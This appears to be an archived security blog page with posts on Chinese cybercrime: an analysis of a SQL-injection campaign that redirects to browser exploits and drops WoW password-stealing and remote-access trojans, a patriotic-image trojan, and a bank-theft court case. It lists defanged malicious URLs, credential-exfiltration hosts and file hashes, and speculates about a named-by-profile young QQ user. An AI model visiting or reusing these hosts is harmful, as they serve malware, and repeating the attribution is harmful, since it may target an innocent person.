The Dark Visitor

Trojan Horse

So the Analyt’s Diary blog at viruslist.com has an article on some new mass SQL injection attack that jacks up .asp pages with redirects to browser exploits. The exploits drop one of two trojans that steal passwords and whatnot. Here is h.js:

document.write(”");
document.write(”");

Wordpress won’t display the script. Basically, it loads an iframe that points to two separate URLS (these URLs contain browser exploits so don’t follow them):

hxxp://vvexe.com/haha/index.html and
hxxp://www.kenya.com/faq.htm

I can’t seem to get to either of these sites at the moment. I’ll try again later.

Update:  I spent some time looking at this malware.  The two pages listed earlier in this post contain iframes to browser plug-in exploits for real player and other typical vulnerabilities.  The exploits attempt to load and run down.exe (e160f590d894a98474697ac0db987746 not packed/delphi code) which in turn downloads hxxp://www.vvexe.com/haha/down.txt to get the additional files 1.exe (a7fc8c966fdeb550fe19aba3169569be not packed/VC++), do.exe (5af5edaa2cebf1fed56ad36799b2c850 ) and cool.exe (18867d6de1a3a9241c14c22c19b51351 not packed/delphi).

1.exe is a WoW trojan and waits for passwords sent to:

grunt.wowchina.com and [kr|us|tw|eu].[version|logon].worldofwarcraft.com.  It also looks for and attempts to disable many types of security software.  It attempts to send the stolen credentials to an asp on www.yilu777.com.

do.exe is a little more interesting.  It appears to be a generic remote access trojan that sends a beacon to qq number 58836533.  A quick search for that qq number revealed that this person’s paipai account has been frozen:

So I do some more digging and find the QQ profile with a name and nick:

Searching for the nickname got me to a few blogs and profiles that had some young girl who is really into anime. Maybe her QQ account got pwn3d or maybe, just maybe she is a member of “China Girl Security”. I tried to get an add on that QQ account so I could talk to the hacker but didn’t have any luck.

Note to Chinese hackers: Please pay the tax on your WoW gold profits.

If I was in the business of spotting popular trends, the first thing I would do is a hire a Chinese hacker. While the rest of the world is passively watching events unfold around them, Chinese hackers are doing the math on how many people will participate and what online avenues are associated with them…like symbols.

According to an article in tech.ccidnet.com, hackers are using recent events and the patriotism they have inspired to spread a new trojan called, “Red Heart Robber.”  The snatching of the Olympic torch, the CNN incident, and earthquake in Sichuan have caused the Chinese online community to attach red hearts with the Chinese flag (and other variations) to their QQ sig and webpages to show support/sympathy for China.  When normal online users download the image of the red heart flag to show their support for China, a nasty little trojan is attached.

Attacking your own symbol of patriotism…not cool!

I found this article this morning from the English language Shanghai Daily.  The article reports that three hackers and an idiot were jailed for using trojan horse programs to steal bank login credentials and then transferred the money to the idiot’s own account.

Yu then used a laptop they bought together to log onto the accounts,
targeting accounts with a great deal of money.

He transferred the money to his own online account. Yu, Chen and Zhao
then drew money out of Yu’s accounts using ATMs in different areas.

They allegedly stole 127,800 Yuan from three victims.  See also Heike’s posts about Hacking for Money and Never Hack Inside China, Ever.  These guys are probably not the  immoral, robotic-like assassins that the PRC government is concerned about.

Update:  I’m having trouble loading the page.  You can find a mirror of the article on the infosec news list archive on Neohapsis here.